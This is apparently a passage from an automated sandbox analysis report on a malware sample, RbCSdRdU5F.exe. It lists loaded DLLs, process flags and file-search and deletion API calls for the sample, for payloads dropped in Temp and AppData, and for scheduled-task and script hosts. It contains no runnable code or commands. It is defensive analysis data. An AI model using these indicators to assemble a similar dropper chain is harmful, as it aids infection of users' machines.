Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: pnrpnsp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: webio.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: wsock32.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: version.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: winmm.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: mpr.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: wininet.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: iphlpapi.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: userenv.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: uxtheme.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: kernel.appcore.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: windows.storage.dll | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Section loaded: wldp.dll | |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Code function: 0_2_00406850 FindFirstFileW,FindClose, | 0_2_00406850 |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Code function: 0_2_0040290B FindFirstFileW, | 0_2_0040290B |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 0_2_00405C26 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0019A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 26_2_0019A087 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0019A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 26_2_0019A1E2 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0018E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, | 26_2_0018E472 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0019A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, | 26_2_0019A570 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0015C622 FindFirstFileExW, | 26_2_0015C622 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001966DC FindFirstFileW,FindNextFileW,FindClose, | 26_2_001966DC |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00197333 FindFirstFileW,FindClose, | 26_2_00197333 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, | 26_2_001973D4 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0018D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 26_2_0018D921 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0018DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 26_2_0018DC54 |